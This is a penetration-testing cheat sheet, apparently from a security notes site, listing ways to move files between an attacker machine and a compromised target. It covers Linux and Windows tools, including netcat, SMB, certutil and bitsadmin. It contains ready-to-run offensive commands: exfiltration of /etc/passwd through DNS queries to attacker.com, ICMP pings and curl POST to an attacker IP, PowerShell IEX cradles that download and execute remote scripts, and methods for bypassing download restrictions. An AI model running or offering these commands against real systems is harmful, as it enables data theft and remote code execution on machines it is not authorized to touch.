File Transfer Methods

Linux to Linux
#

HTTP Server
#

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
# Python HTTP server (attacker)
python3 -m http.server 8000
python -m SimpleHTTPServer 8000

# Download on target
wget http://10.10.14.5:8000/file
curl http://10.10.14.5:8000/file -o file

# PHP HTTP server
php -S 0.0.0.0:8000

# Ruby HTTP server
ruby -run -e httpd . -p 8000

# Busybox HTTP server
busybox httpd -f -p 8000

Netcat
#

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
# Receiver (target)
nc -lvnp 4444 > file

# Sender (attacker)
nc 10.10.10.10 4444 < file

# Alternative (sender first)
# Sender (attacker)
nc -lvnp 4444 < file

# Receiver (target)
nc 10.10.14.5 4444 > file

SCP
#

1
2
3
4
5
6
7
8
# Upload to target
scp file user@target:/tmp/file

# Download from target
scp user@target:/tmp/file ./file

# Recursive directory
scp -r directory user@target:/tmp/

Base64
#

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
# Encode on attacker
base64 file > file.b64

# Copy content and decode on target
echo "base64_content" | base64 -d > file

# One-liner
cat file | base64 -w 0
# Paste output on target:
echo "paste_here" | base64 -d > file

Socat
#

1
2
3
4
5
# Receiver (target)
socat TCP-LISTEN:4444,reuseaddr,fork OPEN:file,creat

# Sender (attacker)
socat TCP:10.10.10.10:4444 FILE:file

Windows to Linux
#

PowerShell Download
#

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
# Download file
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.5:8000/file','C:\Temp\file')"

# Alternative
powershell -c "Invoke-WebRequest -Uri 'http://10.10.14.5:8000/file' -OutFile 'C:\Temp\file'"

# IWR alias
powershell -c "iwr -uri 'http://10.10.14.5:8000/file' -outfile 'C:\Temp\file'"

# Download and execute
powershell -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/script.ps1')"

Certutil
#

1
2
3
4
5
# Download file
certutil -urlcache -f http://10.10.14.5:8000/file file

# Alternative
certutil -verifyctl -split -f http://10.10.14.5:8000/file

BITSAdmin
#

1
2
# Download file
bitsadmin /transfer job /download /priority high http://10.10.14.5:8000/file C:\Temp\file

SMB
#

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
# Start SMB server (attacker - Linux)
impacket-smbserver share . -smb2support

# Access from Windows
copy \\10.10.14.5\share\file C:\Temp\file

# With authentication
impacket-smbserver share . -smb2support -username user -password pass

# Access with auth
net use \\10.10.14.5\share /user:user pass
copy \\10.10.14.5\share\file C:\Temp\file

FTP
#

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
# Start FTP server (attacker)
python3 -m pyftpdlib -p 21 -w

# Download on Windows
echo open 10.10.14.5 21> ftp.txt
echo USER anonymous>> ftp.txt
echo anonymous>> ftp.txt
echo binary>> ftp.txt
echo GET file>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt

Linux to Windows
#

PowerShell Upload
#

1
2
# Upload via POST
powershell -c "(New-Object System.Net.WebClient).UploadFile('http://10.10.14.5:8000/upload', 'C:\file')"

Netcat (Windows)
#

1
2
3
4
5
# Receiver (attacker - Linux)
nc -lvnp 4444 > file

# Sender (Windows)
nc.exe 10.10.14.5 4444 < C:\file

SMB Upload
#

1
2
3
4
5
# SMB server (attacker)
impacket-smbserver share . -smb2support

# Upload from Windows
copy C:\file \\10.10.14.5\share\file

Exfiltration Methods
#

DNS Exfiltration
#

1
2
3
4
5
# Encode and send via DNS
cat /etc/passwd | base64 | while read line; do dig $line.attacker.com; done

# Receive on attacker (tcpdump)
tcpdump -i eth0 -n port 53

ICMP Exfiltration
#

1
2
3
4
5
# Send data via ICMP
cat file | xxd -p -c 16 | while read line; do ping -c 1 -p $line 10.10.14.5; done

# Receive on attacker
tcpdump -i eth0 icmp

HTTP POST
#

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
# Upload via curl
curl -X POST -F "file=@/etc/passwd" http://10.10.14.5:8000/upload

# Simple upload server (Python)
# upload_server.py
from http.server import HTTPServer, BaseHTTPRequestHandler
class Upload(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers['Content-Length'])
        data = self.rfile.read(length)
        with open('uploaded', 'wb') as f:
            f.write(data)
        self.send_response(200)
        self.end_headers()
HTTPServer(('', 8000), Upload).serve_forever()

Download Cradles (Windows)
#

PowerShell
#

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
# IEX download and execute
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/script.ps1')

# Invoke-WebRequest
IWR -Uri http://10.10.14.5/file -OutFile file

# Start-BitsTransfer
Start-BitsTransfer -Source http://10.10.14.5/file -Destination C:\Temp\file

# Invoke-RestMethod
Invoke-RestMethod -Uri http://10.10.14.5/file -OutFile file

CMD
#

1
2
3
4
5
6
7
8
# PowerShell one-liner
powershell -c IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/script.ps1')

# Certutil
certutil -urlcache -f http://10.10.14.5/file file

# BITSAdmin
bitsadmin /transfer job http://10.10.14.5/file C:\Temp\file

VBScript
#

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
' download.vbs
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", "http://10.10.14.5/file", False
objXMLHTTP.send()
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
objADOStream.SaveToFile "C:\Temp\file"
objADOStream.Close
Set objADOStream = Nothing
Set objXMLHTTP = Nothing

1
2
# Execute
cscript download.vbs

Alternative Methods
#

Bash TCP
#

1
2
3
4
# Download file
exec 3<>/dev/tcp/10.10.14.5/8000
echo -e "GET /file HTTP/1.1\r\nHost: 10.10.14.5\r\n\r\n" >&3
cat <&3 > file

Python
#

1
2
3
4
5
# Download
python -c "import urllib; urllib.urlretrieve('http://10.10.14.5/file', 'file')"

# Python 3
python3 -c "import urllib.request; urllib.request.urlretrieve('http://10.10.14.5/file', 'file')"

Perl
#

1
2
# Download
perl -e 'use LWP::Simple; getstore("http://10.10.14.5/file", "file");'

Ruby
#

1
2
# Download
ruby -e 'require "net/http"; File.write("file", Net::HTTP.get(URI.parse("http://10.10.14.5/file")))'

PHP
#

1
2
# Download
php -r '$file = file_get_contents("http://10.10.14.5/file"); file_put_contents("file",$file);'

JavaScript (Node.js)
#

1
2
# Download
node -e 'require("fs").writeFileSync("file", require("https").get("http://10.10.14.5/file"))'

Bypassing Restrictions
#

Download without wget/curl
#

1
2
3
4
5
6
7
8
9
# Using /dev/tcp
exec 3<>/dev/tcp/10.10.14.5/8000
echo -e "GET /file HTTP/1.1\r\nHost: 10.10.14.5\r\n\r\n" >&3
cat <&3

# Using telnet
telnet 10.10.14.5 8000
GET /file HTTP/1.1
Host: 10.10.14.5

Encoding
#

1
2
3
4
5
6
7
8
9
# Hex encoding
xxd -p file > file.hex
# On target:
xxd -r -p file.hex > file

# Gzip + Base64
cat file | gzip | base64 -w 0
# On target:
echo "base64_content" | base64 -d | gunzip > file

[PROTOCOL] Choose the appropriate method based on available tools and network restrictions
[TIP] Always verify file integrity after transfer using MD5/SHA checksums

Linux to Linux#

HTTP Server#

Netcat#

SCP#

Base64#

Socat#

Windows to Linux#

PowerShell Download#

Certutil#

BITSAdmin#

SMB#

FTP#

Linux to Windows#

PowerShell Upload#

Netcat (Windows)#

SMB Upload#

Exfiltration Methods#

DNS Exfiltration#

ICMP Exfiltration#

HTTP POST#

Download Cradles (Windows)#

PowerShell#

CMD#

VBScript#

Alternative Methods#

Bash TCP#

Python#

Perl#

Ruby#

PHP#

JavaScript (Node.js)#

Bypassing Restrictions#

Download without wget/curl#

Encoding#

Linux to Linux
#

HTTP Server
#

Netcat
#

SCP
#

Base64
#

Socat
#

Windows to Linux
#

PowerShell Download
#

Certutil
#

BITSAdmin
#

SMB
#

FTP
#

Linux to Windows
#

PowerShell Upload
#

Netcat (Windows)
#

SMB Upload
#

Exfiltration Methods
#

DNS Exfiltration
#

ICMP Exfiltration
#

HTTP POST
#

Download Cradles (Windows)
#

PowerShell
#

CMD
#

VBScript
#

Alternative Methods
#

Bash TCP
#

Python
#

Perl
#

Ruby
#

PHP
#

JavaScript (Node.js)
#

Bypassing Restrictions
#

Download without wget/curl
#

Encoding
#